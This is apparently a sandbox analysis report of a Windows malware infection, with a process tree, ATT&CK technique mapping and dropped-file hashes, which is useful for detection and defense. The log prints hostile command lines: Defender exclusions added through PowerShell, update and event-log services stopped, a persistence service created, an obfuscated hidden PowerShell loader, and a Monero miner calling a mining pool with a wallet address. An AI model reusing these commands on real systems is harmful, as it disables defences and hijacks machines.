        Suspicious use of AdjustPrivilegeToken
        
        PID:7700
      - C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" start winsvc
        6⤵
        Launches sc.exe
        
        PID:5936
- C:\Users\Admin\AppData\Local\Temp\a\taskweaker.exe
  "C:\Users\Admin\AppData\Local\Temp\a\taskweaker.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4564
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    PID:2252
- C:\Users\Admin\AppData\Local\Temp\a\ama.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ama.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2216
- - C:\Users\Admin\AppData\Local\Temp\6.exe
    "C:\Users\Admin\AppData\Local\Temp\6.exe"
    3⤵
    - Executes dropped EXE
    PID:7992
- C:\Users\Admin\AppData\Local\Temp\a\setup222.exe
  "C:\Users\Admin\AppData\Local\Temp\a\setup222.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
    SetupWizard.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3868
  - - C:\Users\Admin\AppData\Local\Temp\SetupWizard-05b1525f32bc5566\SetupWizard.exe
      "C:\Users\Admin\AppData\Local\Temp\SetupWizard-05b1525f32bc5566\SetupWizard.exe"
      4⤵
      Executes dropped EXE
      PID:2196
- - C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
    SetupWizard.exe
    3⤵
    PID:5128
  - - C:\Users\Admin\AppData\Local\Temp\SetupWizard-d6bcf6e35b011d64\SetupWizard.exe
      "C:\Users\Admin\AppData\Local\Temp\SetupWizard-d6bcf6e35b011d64\SetupWizard.exe"
      4⤵
      PID:13076
- - C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
    SetupWizard.exe
    3⤵
    PID:20132
  - - C:\Users\Admin\AppData\Local\Temp\SetupWizard-faaa44bc4cb019f1\SetupWizard.exe
      "C:\Users\Admin\AppData\Local\Temp\SetupWizard-faaa44bc4cb019f1\SetupWizard.exe"
      4⤵
      PID:12652
- - C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
    SetupWizard.exe
    3⤵
    PID:7116
  - - C:\Users\Admin\AppData\Local\Temp\SetupWizard-1cdb74005a4fe26a\SetupWizard.exe
      "C:\Users\Admin\AppData\Local\Temp\SetupWizard-1cdb74005a4fe26a\SetupWizard.exe"
      4⤵
      PID:14328
- - C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
    SetupWizard.exe
    3⤵
    PID:9164
  - - C:\Users\Admin\AppData\Local\Temp\SetupWizard-fea49c143adfa31e\SetupWizard.exe
      "C:\Users\Admin\AppData\Local\Temp\SetupWizard-fea49c143adfa31e\SetupWizard.exe"
      4⤵
      PID:15288
- - C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
    SetupWizard.exe
    3⤵
    PID:10420
  - - C:\Users\Admin\AppData\Local\Temp\SetupWizard-477ac196fe97790c\SetupWizard.exe
      "C:\Users\Admin\AppData\Local\Temp\SetupWizard-477ac196fe97790c\SetupWizard.exe"
      4⤵
      PID:17296
- - C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
    SetupWizard.exe
    3⤵
    PID:9500
  - - C:\Users\Admin\AppData\Local\Temp\SetupWizard-26481258dc2cd9e4\SetupWizard.exe
      "C:\Users\Admin\AppData\Local\Temp\SetupWizard-26481258dc2cd9e4\SetupWizard.exe"
      4⤵
      PID:11532
- C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe
  "C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1444
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:10876
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5888
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:10880
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:7132
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:10956
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:6584
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:11048
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:11088
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:9752
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:6528
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:7728
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WSNKISKT"
    3⤵
    - Launches sc.exe
    PID:8472
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4636
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5616
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WSNKISKT"
    3⤵
    - Launches sc.exe
    PID:9348
- C:\Users\Admin\AppData\Local\Temp\a\pic1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\pic1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1124
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exe
      rolex.exe -priverdD
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2068
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4988
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4496
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
        6⤵
        
        PID:7544
- C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3472
- - C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
    "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:420
- C:\Users\Admin\AppData\Local\Temp\a\pic15.exe
  "C:\Users\Admin\AppData\Local\Temp\a\pic15.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:900
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    PID:7968
- C:\Users\Admin\AppData\Local\Temp\a\limba.exe
  "C:\Users\Admin\AppData\Local\Temp\a\limba.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  PID:2424
- C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe"
  2⤵
  - Executes dropped EXE
  PID:1116
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
    3⤵
    PID:4724
- C:\Users\Admin\AppData\Local\Temp\a\1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  PID:4340
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 512
    3⤵
    - Program crash
    PID:3128
- C:\Users\Admin\AppData\Local\Temp\a\gui.exe
  "C:\Users\Admin\AppData\Local\Temp\a\gui.exe"
  2⤵
  - Executes dropped EXE
  PID:696
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -windowstyle hidden "$Uhyggestemninger=Get-Content 'C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Blaze.Udk';$Unyieldingly=$Uhyggestemninger.SubString(54584,3);.$Unyieldingly($Uhyggestemninger)"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1556
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
      4⤵
      PID:4624

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:4664

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5088
- C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
  "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1164

C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe
C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3556
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1940
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4348
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:424
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4904
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:404

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3768

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4392

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:7476

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6084

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:10884

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7112

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9708

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
- Executes dropped EXE
PID:10200
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  PID:7260

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8140

C:\Windows\system32\winsvc.exe
C:\Windows\system32\winsvc.exe
1⤵
PID:8828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:7564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:9004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:12864
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
    3⤵
    - Power Settings
    PID:7036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5900
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:15544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:15324
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:11156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1936
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:10508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-dc" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:7616
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:14172
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "winnet.exe"
  2⤵
  - Kills process with taskkill
  PID:19592
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "winnet.exe"
  2⤵
  - Kills process with taskkill
  PID:18932
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "wincfg.exe"
  2⤵
  - Kills process with taskkill
  PID:19536
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "wincfg.exe"
  2⤵
  - Kills process with taskkill
  PID:13764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Remove-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:9516

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\97d0baa7bf0d4bb09d3a7c5a0d654d4a /t 9044 /p 8140
1⤵
PID:6728

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:5596

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:16668

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:2172

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\2e369f28fa8b41bf9b7cabab8ca1d358 /t 5660 /p 16668
1⤵
PID:16472

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:13848

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\0742ce899b5148419839caee67a00a89 /t 0 /p 13848
1⤵
PID:17228

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:13380

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:14036

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\cb8dfefe095a4e80813398b1cedab18d /t 0 /p 14036
1⤵
PID:17276

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:11244

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:15356

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\4e04f70bfdde4c198047e2a3f84b8ff9 /t 0 /p 15356
1⤵
PID:10212

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:11700

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:17248

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\a14fbef761a64187a4a1228c4119e782 /t 14036 /p 11700
1⤵
PID:4536

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:7840

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:14912

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:14400

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:17704

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:5408

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:9292

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:7700

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:18108

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:18904

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:8928

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:6972

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:3140

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:7812

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:14112

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:3320

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:12624

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:17668

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:936

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:13048

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:13040

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:11756

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:64

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Blaze.Udk

Filesize
53KB

MD5
d2401f10a4fbfda63177af824b7e96cb

SHA1
6f8b9073b641d60e9045865e585efe1085d72d1b

SHA256
dd35b93d3d04cce7fd02df183e70ed55194bd0b20fb051c324d9d869668ebce7

SHA512
4813c9367af384c07daef5a55f98f3156c0351973dbed0a8ac10fcd13bc1b443d2ec0c2d872e293bd65e74a5b1fcf1072054c222ee0adb83cc90fdec2e95f18b

Download Submit
C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Multiplikatoren.Pri

Filesize
343KB

MD5
f344871c6ad32e2b5349eb4c277f85d9

SHA1
9298a5f90e75af375807bfc2df002d4ec88da098

SHA256
df634370973767c3fcc098bc48e4efd2a45d83af800db964fb659356b9a33096

SHA512
3d0d7c159aa899039c399d1a59ca527fb78511445c8d4344146a1e4e3ac74b11801b8ad913d1196f9496a31460f8039476b1d2d667f7540c841ae1455726f198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1cfe572f8a58e5c315192b2262b19389

SHA1
0ee01be5ceb2f4c1769d1461a33900abb85879ea

SHA256
a166e551d09fc5f77e4ede547e3dc521b71f4b5c07b93f16de2b0f976fed6751

SHA512
